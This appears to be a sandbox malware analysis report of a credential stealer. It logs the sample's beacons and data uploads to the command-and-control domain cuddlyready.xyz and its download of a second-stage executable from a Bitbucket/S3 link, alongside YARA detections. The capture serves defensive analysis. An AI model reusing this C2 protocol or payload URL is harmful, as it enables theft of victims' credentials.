2024-12-23 08:23:38 UTC | 15331 | OUT | Data Raw: 2d 2d 5a 38 55 36 46 4d 50 4e 4e 37 59 4b 51 33 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 38 55 36 46 4d 50 4e 4e 37 59 4b 51 33 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 38 55 36 46 4d 50 4e 4e 37 59 4b 51 33 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
Data Ascii: --Z8U6FMPNN7YKQ3BQContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--Z8U6FMPNN7YKQ3BQContent-Disposition: form-data; name="pid"3--Z8U6FMPNN7YKQ3BQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-23 08:23:38 UTC | 5064 | OUT | Data Raw: 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e
Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-23 08:23:39 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:23:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=r9jao9pou795g7qono8fc0raga; expires=Fri, 18 Apr 2025 02:10:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=73W4fC4PBbdXyvhxpmw1M3WhZycaxEW2ZZs7RA3T9bQFpuLK2%2Bk3uKNGPglBI6h3PbMF4Rf1m62pRSrJfWbqnqAM2P1sFzlfq9BRsvaaPoGTExguzLGYCo%2Fkmocj%2F0XURzU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66f3654bcd5e80-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=2114&rtt_var=835&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21354&delivery_rate=1277899&cwnd=218&unsent_bytes=0&cid=86fd6a1c41c1a18b&ts=914&x=0"
2024-12-23 08:23:39 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 08:23:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49716 | 172.67.150.173 | 443 | 7312 | C:\Users\user\Desktop\FBmz85HS0d.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:41 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6GN8K2WS2O3290JLU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1239
Host: cuddlyready.xyz
2024-12-23 08:23:41 UTC | 1239 | OUT | Data Raw: 2d 2d 36 47 4e 38 4b 32 57 53 32 4f 33 32 39 30 4a 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 47 4e 38 4b 32 57 53 32 4f 33 32 39 30 4a 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 47 4e 38 4b 32 57 53 32 4f 33 32 39 30 4a 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
Data Ascii: --6GN8K2WS2O3290JLUContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--6GN8K2WS2O3290JLUContent-Disposition: form-data; name="pid"1--6GN8K2WS2O3290JLUContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-23 08:23:42 UTC | 1120 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:23:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qbalqm8aeaa8hlj0v4s8g4aen2; expires=Fri, 18 Apr 2025 02:10:21 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsFtrDa2TATQIh1prNTXGo2R3k5vUh57HHTQoxjxAW0YPzVL5jWS9trmZ6iGVeEAdm7Q6tAzhqHzeupdzl8085P8Mu3iwCw7lKQd3iXexvuy1Eqwy%2Br00GROvWvPw1Qmy5w%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66f376ade47ce7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1802&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2154&delivery_rate=1585233&cwnd=199&unsent_bytes=0&cid=7a91aae6c75ecbb1&ts=771&x=0"
2024-12-23 08:23:42 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 08:23:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49723 | 172.67.150.173 | 443 | 7312 | C:\Users\user\Desktop\FBmz85HS0d.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:44 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0Q7VO4LRXIG1C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 552437
Host: cuddlyready.xyz
2024-12-23 08:23:44 UTC | 15331 | OUT | Data Raw: 2d 2d 30 51 37 56 4f 34 4c 52 58 49 47 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 51 37 56 4f 34 4c 52 58 49 47 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 51 37 56 4f 34 4c 52 58 49 47 31 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 51 37 56 4f
Data Ascii: --0Q7VO4LRXIG1C
Content-Disposition: form-data; name="hwid"

9AA29BAF5EACF5F1AC8923850305D13E
--0Q7VO4LRXIG1C
Content-Disposition: form-data; name="pid"

1
--0Q7VO4LRXIG1C
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--0Q7VO
2024-12-23 08:23:47 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:23:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=nfveqerjuvtqeecfj0ebdcegum; expires=Fri, 18 Apr 2025 02:10:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbRx%2BjulMDPs4P2Z5i8zuknUJTYRHVI%2Fc5oj04SUaHyC5PZemEiDB00p%2BycR9vVyAaMz9oRekvrHl%2F7D7KIPZ1q5E6ffNz1eCbIlxEhf%2BR6bQSXQpPUH5OYTZUmZunx0d70%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66f3874bdf43df-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2036&min_rtt=2020&rtt_var=790&sent=332&recv=575&lost=0&retrans=0&sent_bytes=2835&recv_bytes=554934&delivery_rate=1356877&cwnd=243&unsent_bytes=0&cid=deb0fb96b1f0bedb&ts=3625&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49740 | 172.67.150.173 | 443 | 7312 | C:\Users\user\Desktop\FBmz85HS0d.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:49 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 88
Host: cuddlyready.xyz
2024-12-23 08:23:49 UTC | 88 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=9AA29BAF5EACF5F1AC8923850305D13E
2024-12-23 08:23:49 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:23:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3aihamo49q3l144ri645g7pe77; expires=Fri, 18 Apr 2025 02:10:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dil%2FfCgjuMLgtJacqBlMJ%2BV9XwcoJQDPopsei819DTFOl6LSk4wlt%2BG%2BJ%2BIu%2BbnFJMSReVB9IGd%2BG%2FxRzJYvZB2KGlxTJ0uffu1HhEq16Tgtz6x%2FI6Lc5q1mRfPgWF%2Bang%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66f3a67fda41e7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2149&min_rtt=2142&rtt_var=818&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1324863&cwnd=202&unsent_bytes=0&cid=124828a7ce5e646d&ts=758&x=0"
2024-12-23 08:23:49 UTC | 232 | IN | Data Raw: 31 31 30 0d 0a 30 73 67 72 79 2b 52 4d 67 72 35 46 65 37 2b 4f 58 35 58 75 49 49 46 65 52 68 30 45 62 38 6a 61 34 51 72 6b 6b 58 46 5a 33 46 69 4a 73 77 6d 2b 78 6e 61 67 31 6a 45 50 7a 2f 31 6c 79 63 46 38 72 6a 77 76 61 57 59 61 71 37 47 45 66 73 72 2b 41 7a 36 41 64 37 2b 78 52 61 36 54 4f 2b 33 4d 4c 67 6a 50 37 7a 7a 77 33 78 4b 79 62 58 63 76 57 45 43 37 75 59 39 75 75 4c 34 56 4e 71 73 32 76 71 64 4b 72 35 63 51 72 66 67 71 43 64 4c 76 4b 2b 47 48 54 75 59 64 4c 6e 78 32 42 72 79 37 67 32 61 42 76 78 51 68 75 58 72 2b 36 6b 32 2f 78 6e 61 79 6b 6d 63 65 6e 62 52 75 36 4d 4a 62 6f 79 74 6b 4a 79 59 48 76 4b 36 52 4d 4c 69 2b 4c 58 62 74 59 4f 66 6d 47 66 72 52 59 72 4f 50 64 6c 57
Data Ascii: 110
0sgry+RMgr5Fe7+OX5XuIIFeRh0Eb8ja4QrkkXFZ3FiJswm+xnag1jEPz/1lycF8rjwvaWYaq7GEfsr+Az6Ad7+xRa6TO+3MLgjP7zzw3xKybXcvWEC7uY9uuL4VNqs2vqdKr5cQrfgqCdLvK+GHTuYdLnx2Bry7g2aBvxQhuXr+6k2/xnaykmcenbRu6MJboytkJyYHvK6RMLi+LXbtYOfmGfrRYrOPdlW
2024-12-23 08:23:49 UTC | 47 | IN | Data Raw: 4f 75 41 4f 36 67 55 62 6e 41 6d 6c 35 59 51 6e 6d 76 35 6c 76 78 72 31 54 50 36 68 36 36 50 67 48 36 59 46 75 75 49 38 34 4a 67 3d 3d 0d 0a
Data Ascii: OuAO6gUbnAml5YQnmv5lvxr1TP6h66PgH6YFuuI84Jg==
2024-12-23 08:23:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        8192.168.2.749746185.166.143.504437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:51 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Host: bitbucket.org
2024-12-23 08:23:52 UTC | 5933 | IN | HTTP/1.1 302 Found
Date: Mon, 23 Dec 2024 08:23:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI [TRUNCATED]
Expires: Mon, 23 Dec 2024 08:23:51 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 71ffdd0e333d
X-Version: c9b3998323c0
X-Static-Version: c9b3998323c0
X-Request-Count: 319
X-Render-Time: 0.04440021514892578
X-B3-Traceid: d2dad6f796314fae90bf4b9d39ba3b8d
X-B3-Spanid: d822cd749f48d5f7
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
X-Usage-Quota-Remaining: 999203.784
X-Usage-Request-Cost: 809.60
X-Usage-User-Time: 0.023433
X-Usage-System-Time: 0.000855
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: d2dad6f796314fae90bf4b9d39ba3b8d
Atl-Request-Id: d2dad6f7-9631-4fae-90bf-4b9d39ba3b8d
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=3,atl-edge-upstream;dur=151,atl-edge-pop;desc="aws-eu-central-1"
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49752 | 3.5.25.82 | 443 | 7312 | C:\Users\user\Desktop\FBmz85HS0d.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:54 UTC | 1342 | OUT | GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGt [TRUNCATED]
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com
2024-12-23 08:23:54 UTC | 574 | IN | HTTP/1.1 200 OK
x-amz-id-2: CV/H5a5FiiUx9oZ21ULV3Wsz8WKsqYSr85Rs4kvZWM26k8dgj8MiaXVmXWORUE4IemIQw7Q4youKRv2be/xQSn/vvtG8LDw2
x-amz-request-id: YVJQ5QCSMDQD5YTW
Date: Mon, 23 Dec 2024 08:23:55 GMT
Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
x-amz-server-side-encryption: AES256
x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
Content-Disposition: attachment; filename="FormattingCharitable.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 1325507
Server: AmazonS3
Connection: close


Target ID: 0
Start time: 03:23:24
Start date: 23/12/2024
Path: C:\Users\user\Desktop\FBmz85HS0d.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\FBmz85HS0d.exe"
Imagebase: 0x2a0000
File size: 2'931'712 bytes
MD5 hash: 30669D81A7FC7B2867ECC452CE55D1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 11
Start time: 05:12:35
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876
Imagebase: 0x480000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.1405967679.0000000001208000.00000004.00000020.00020000.00000000.sdmp, Offset: 01208000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1208000_FBmz85HS0d.jbxd
Memory Dump Source
• Source File: 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
• Associated: 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1225000_FBmz85HS0d.jbxd
Memory Dump Source
• Source File: 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
• Associated: 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1225000_FBmz85HS0d.jbxd